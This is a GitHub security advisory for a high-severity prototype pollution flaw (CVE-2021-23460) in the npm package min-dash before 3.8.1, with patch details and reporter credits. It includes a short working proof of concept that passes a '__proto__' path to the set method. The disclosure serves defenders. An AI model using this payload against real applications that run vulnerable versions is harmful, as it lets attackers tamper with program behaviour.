Skip to content

Prototype pollution in min-dash < 3.8.1

High
nikku published GHSA-2m53-83f3-562j Jan 27, 2022

Package

npm min-dash (npm)

Affected versions

< 3.8.1

Patched versions

3.8.1

Description

Impact

The set method is vulnerable to prototype pollution with specially crafted inputs.

// insert the following into poc.js and run node poc,js (after installing the package)
 
let parser = require("min-dash");
parser.set({}, [["__proto__"], "polluted"], "success");
console.log(polluted);

Patches

min-dash>=3.8.1 fix the issue.

Workarounds

No workarounds exist for the issue.

References

Closed via #21.

Credits

Credits to Cristian-Alexandru STAICU who found the vulnerability and to Idan Digmi from the Snyk Security Team who reported the vulnerability to us, responsibly.

Severity

High

CVE ID

CVE-2021-23460

Weaknesses

No CWEs

Credits